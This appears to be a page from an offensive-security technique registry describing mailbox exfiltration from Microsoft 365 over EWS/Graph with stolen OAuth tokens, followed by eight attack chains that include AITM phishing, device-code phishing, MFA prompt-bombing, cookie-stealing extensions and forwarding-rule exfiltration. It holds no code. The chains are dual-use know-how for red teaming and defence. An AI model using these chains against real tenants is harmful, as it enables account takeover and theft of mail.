M365-EWS-EXFILCollection

Exchange Web Services (EWS) Exfil

Use an OAuth-token to query EWS / Graph for entire mailboxes — bypasses many DLP that focus on Outlook clients.

§ Where this technique fits

M365-EWS-EXFIL is catalogued under the Collection tactic of the offensive-security kill-chain. It appears in 8 approved dossiers in the registry, typically at step 5.1 on average.

§ Dossiers chaining this technique

Compromised vendor mailbox → reply-chain phishing → client compromise
Take over a vendor / partner mailbox via AITM phishing. Reply to an existing thread with a malicious link — trust transferred from the genuine prior conversation defeats most user training.
step 2 / 6
Mailbox forwarding rule → silent data exfil
Compromised user account. Create an Inbox / transport rule that auto-forwards every incoming message to an external attacker mailbox — invisible until an admin reviews mailbox rules.
step 4 / 4
OAuth device-code phishing → M365 access without a fake page
Initiate a device-code flow against login.microsoftonline.com; send the code + url to the victim via email or chat. Once they enter it, attacker gets access + refresh tokens.
step 5 / 6
FIDO2 caBLE hybrid → phone authenticator hijack
Attacker phishing site shows the legitimate FIDO2 QR. Victim scans with their phone authenticator. The link completes the WebAuthn ceremony in the attacker's browser — they're now signed in as the victim.
step 6 / 6
Slack token in CI log → DM history → vendor mailbox compromise
A CI run echoed a Slack xoxb-/xoxp- token. Use it to read DMs, harvest password-reset links and vendor invitations, pivot into the corporate mailbox.
step 6 / 6
Malicious browser extension → cookie harvest → ATO
Publish a useful-looking extension (ad-blocker / PDF reader). It quietly reads cookies + localStorage from sensitive sites and ships them to the attacker.
step 6 / 6
MFA fatigue / prompt-bombing → M365 admin compromise
Attacker has the password (from breach / spray) but not MFA. Spam push approvals at 2 AM until the user taps yes out of habit — used in the Uber and 0ktapus breaches.
step 6 / 6
AITM phishing (Evilginx) → M365 session theft → mailbox exfil
Reverse-proxy phishing kit intercepts the entire login flow including MFA. Stolen session cookie → access M365 mailbox / SharePoint without retriggering auth.
step 6 / 7

§ What commonly comes next

01
AAD Token Cache Exfil
M365-TOKEN-EXFIL · Credential Access
seen 1×
02
Conversation Hijacking / Reply-Chain Attack
EM-CONVERSATION-HIJACK · Initial Access
seen 1×
03
Mailbox Forwarding Rule
M365-MAILBOX-FORWARD · Collection
seen 1×

§ Where this technique fits

§ Dossiers chaining this technique

Compromised vendor mailbox → reply-chain phishing → client compromise

Mailbox forwarding rule → silent data exfil

OAuth device-code phishing → M365 access without a fake page

FIDO2 caBLE hybrid → phone authenticator hijack

Slack token in CI log → DM history → vendor mailbox compromise

Malicious browser extension → cookie harvest → ATO

MFA fatigue / prompt-bombing → M365 admin compromise

AITM phishing (Evilginx) → M365 session theft → mailbox exfil

§ What commonly comes next